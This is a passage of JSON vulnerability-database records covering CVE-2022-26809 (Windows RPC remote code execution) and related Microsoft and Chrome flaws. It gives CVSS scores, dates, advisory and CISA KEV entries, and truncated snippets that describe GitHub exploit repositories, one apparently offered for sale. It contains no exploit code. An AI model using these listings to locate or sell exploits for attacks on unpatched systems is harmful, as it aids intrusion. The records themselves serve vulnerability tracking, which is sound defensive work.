"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T12:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-09-30T03:52:53", "id": "695F2F3F-E377-59B0-8A5F-4D36BE54BA18", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:27:58", "description": "# PoC-CVE-2022-26809\n\nPoC for CVE-2022-26809, analisys and consi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T11:08:33", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2023-05-27T08:19:03", "id": "7DD6705D-7B96-56E9-8ADE-4684010F1A61", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:32:10", "description": "# CVE-2022-26809\n\nvuln scaner and exploit \n\n\u041c\u044b Hell Knights Crew...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-18T19:26:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2023-05-05T17:29:49", "id": "242E006E-772E-5E86-9F48-B134D7624197", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:30:15", "description": "# CVE-2022-26809\n\nDetects attempts and successful exploitation o...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T16:58:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2023-03-08T07:53:10", "id": "7030A9DA-EAD0-589C-BA80-9DF1BBF37F0A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:32:34", "description": "# CVE description\nCVE-2022-26809 - weakness in a core Windows co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T08:12:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2023-05-10T13:48:11", "id": "6639E3A7-8544-588C-80A6-A9CC4D11C0D8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:32:48", "description": "# CVE-2022-26809-RCE\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T20:54:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2023-04-19T08:27:52", "id": "5E3C3527-A8AB-573F-B617-ACCD672ED2FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-21T18:28:43", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T14:09:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-21T17:03:53", "id": "0AA1EF4C-0788-53B4-B8B7-BE7502CC290D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-19T10:10:54", "description": "# CVE-2022-26809 RCE Exploit\n\n## CVE description\nCVE-2022-26809 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T03:35:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-05-19T10:05:21", "id": "69096CC9-9889-522F-9A0F-043629E15B77", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-29T11:12:39", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-04T09:22:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-09-29T08:16:19", "id": "18B2B79F-C680-583E-8CD2-F27E10E7C736", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-03T16:43:32", "description": "FOR BUYING VISIT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-30T15:49:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-10-03T13:44:42", "id": "E872ADEA-727B-5F6F-A079-7258B7710EEB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-13T02:05:03", "description": "# CVE-2022-26809-POC\nmetasploit module for CVE-2022-26809 window...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-11T14:41:10", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-09-13T01:19:07", "id": "4608D630-EBBB-5D8B-BDC8-39BE4409DA69", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-21T18:28:41", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T14:09:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-21T17:03:53", "id": "2A45AC5C-3583-5B97-96FD-54EDC121AE8B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:34:55", "description": "# Chrome-and-Edge-Version-Dumper\nPowershell script ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T20:06:33", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2023-02-14T14:46:28", "id": "D424D6C6-13F7-5CAE-8771-9103296520B9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-04-22T19:30:18", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Network File System Remote Code Execution (CVE-2022-24491)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491"], "modified": "2022-04-12T00:00:00", "id": "CPAI-2022-0195", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-29T10:06:21", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Network File System Remote Code Execution (CVE-2022-24497)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24497"], "modified": "2022-04-12T00:00:00", "id": "CPAI-2022-0192", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-22T19:30:10", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2022-24521)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-04-12T00:00:00", "id": "CPAI-2022-0101", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-19T23:31:50", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft RPC Remote Code Execution (CVE-2022-26809)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-19T00:00:00", "id": "CPAI-2022-0202", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-25T00:00:00", "id": "CISA-KEV-CVE-2022-26904", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Windows Common Log File System (CLFS) Driver contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows CLFS Driver Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-04-13T00:00:00", "id": "CISA-KEV-CVE-2022-24521", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:17:33", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": 